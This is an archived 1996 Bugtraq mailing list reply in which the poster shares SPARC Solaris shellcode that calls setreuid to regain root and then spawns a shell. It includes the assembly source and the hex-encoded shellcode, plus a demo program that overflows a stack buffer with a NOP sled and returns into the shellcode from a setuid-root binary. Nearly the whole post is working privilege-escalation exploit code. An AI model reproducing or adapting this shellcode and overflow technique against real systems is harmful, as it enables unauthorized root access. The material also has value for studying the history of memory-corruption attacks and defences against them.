Bugtraq mailing list archives
Re: /bin/ksh sparc code
From: aaronb () j51 com (Aaron Bornstein)
Date: Tue, 3 Dec 1996 15:18:19 -0500
Our good buddy Kichang wrote the following:
So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0). I know it's no big deal, almost close to lame, but I think it's kinda
That's one way to do it, but I don't like ksh. So, I decided to modify it to do a setreuid() call before anything else. Here's the code: --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE-- /* Solaris */ main() { __asm__ ( "mov 0xca, %g1 \n" /* 202 - setreuid() */ "xor %o1,%o1,%o1 \n" "and %o1,%o1,%o0 \n" "ta 8 \n" "sethi 0xbd89a, %l6 \n" "or %l6, 0x16e, %l6 \n" "sethi 0xbdcda, %l7 \n" "and %sp, %sp, %o0 \n" "add %sp, 8, %o1 \n" "xor %o2, %o2, %o2 \n" "add %sp, 16, %sp \n" "std %l6, [%sp - 16] \n" "st %sp, [%sp - 8] \n" "st %g0, [%sp - 4] \n" "mov 0x3b, %g1 \n" /* 59 - execve() */ "ta 8 \n" ); } --CUT HERE--solaris-setreuid-shellcode.c--CUT HERE-- And a demonstration program. Usage: # cc -o demo demo.c # chmod 4755 demo # su plainuser % ./demo # --CUT HERE--solaris-shellcode-example1.c--CUT HERE-- #include <sys/types.h> #define NOP 0xa61cc013 #define BUFSIZE 256 #define CODESIZE 64 char shellcode[] = "\x82\x10\x20\xca\x92\x1a\x40\x09\x90\x0a\x40\x09\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"; char bigbuf[BUFSIZE * 2]; u_long get_sp() { __asm__("mov %sp, %i0 \n"); } void overflow_me() { char lilbuf[BUFSIZE]; u_long *lp; char *cp; int i; lp = (u_long *)bigbuf; for (i = 0 ; i < BUFSIZE - CODESIZE ; i += 4) *lp++ = NOP; cp = (char *)lp; for (i = 0 ; i < CODESIZE ; i++) *cp++ = shellcode[i]; lp = (u_long *)cp; for (i = BUFSIZE ; i < BUFSIZE * 2 ; i += 4) /* *lp++ = (u_long)lilbuf; */ *lp++ = get_sp() + 224; strcpy(lilbuf, bigbuf); } void main(int argc, char **argv) { overflow_me(); } --CUT HERE--solaris-shellcode-example1.c--CUT HERE--
Current thread:
- Re: /bin/ksh sparc code Aaron Bornstein (Dec 03)